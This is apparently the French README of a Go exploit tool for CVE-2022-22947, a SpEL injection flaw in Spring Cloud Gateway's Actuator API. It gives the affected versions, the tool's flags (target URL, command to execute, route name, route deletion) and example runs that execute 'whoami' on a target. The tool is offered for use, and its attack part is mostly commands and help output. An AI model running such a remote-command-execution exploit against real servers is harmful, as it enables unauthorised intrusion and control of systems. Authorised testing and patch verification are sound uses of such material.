
Exploit basé sur Go pour CVE-2022-22947, une vulnérabilité d'injection SpEL dans Spring Cloud Gateway, permettant l'exécution de commandes à distance via l'API Actuator.
Spring Cloud Gateway est une passerelle API de Spring. Dans ses versions 3.1.0 et 3.0.6 (incluses) et antérieures, une vulnérabilité d'injection d'expression SpEL existe. Lorsqu'un attaquant peut accéder à l'API Actuator, il peut exploiter cette vulnérabilité pour exécuter des commandes arbitraires.
Utilisation :
➜ ./cve-2022-22947 -h
Usage of cve-2022-22947:
-c string
Execute command, Example: whoami (default "id")
-d Delete route.
-r string
New route name
-u string
Target Url, Example: http://127.0.0.1:8080
# example
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d
Problèmes rencontrés : https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/